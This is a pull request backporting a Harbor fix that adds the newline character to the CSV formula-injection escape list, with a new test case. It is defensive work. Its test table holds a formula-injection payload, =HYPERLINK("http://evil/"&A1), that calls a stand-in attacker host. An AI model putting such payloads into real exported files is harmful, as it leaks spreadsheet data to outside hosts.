### PR TITLE
upstream: fix: Add \n to the escape pattern (goharbor/harbor#23697)

### DIFF
--- a/src/pkg/scan/export/csv_sanitize_test.go
+++ b/src/pkg/scan/export/csv_sanitize_test.go
@@ -32,6 +32,7 @@ func TestSanitizeCSVCell(t *testing.T) {
 		{"at_scoped_npm", "@evil/pkg", "'@evil/pkg"},
 		{"tab", "\tx", "'\tx"},
 		{"carriage_return", "\rx", "'\rx"},
+		{"newline", "\nx", "'\nx"},
 		{"hyperlink", `=HYPERLINK("http://evil/"&A1)`, `'=HYPERLINK("http://evil/"&A1)`},
 		{"benign_package", "libssl1.1", "libssl1.1"},
 		{"benign_version", "1.2.3", "1.2.3"},

--- a/src/pkg/scan/export/manager.go
+++ b/src/pkg/scan/export/manager.go
@@ -147,7 +147,7 @@ func (em *exportManager) Fetch(ctx context.Context, params Params) ([]Data, erro
 
 // csvFormulaTriggers lists the leading characters a spreadsheet may interpret as
 // the start of a formula when opening an exported CSV.
-const csvFormulaTriggers = "=+-@\t\r"
+const csvFormulaTriggers = "=+-@\t\r\n"
 
 // sanitizeCSVCell prefixes a single quote to any value that would otherwise be
 // evaluated as a formula, neutralizing CSV formula injection.


### PR DESCRIPTION
## Summary

Backport of #601 to `release-2.15`: adds `\n` to the CSV formula escape pattern and a test case covering the leading-newline trigger.

## Backport Notes

- The automated `/backport v2.15` originally failed because `release-2.15` lacked the CSV-sanitize code from goharbor/harbor#23677; that prerequisite has since landed via #663.
- This branch is now rebased directly onto `release-2.15` and carries only the `\n` change.

## Upstream Context

- Upstream PR: goharbor/harbor#23697
- Upstream commit: 863180309301bc55417a70d5d76ea9a47afa531b
- Harbor Next main commit: 76c7080cbe6b745df170922d08cef91c1f78f653 (#601)

Upstream-Commit: 863180309301bc55417a70d5d76ea9a47afa531b
Upstream-PR: goharbor/harbor#23697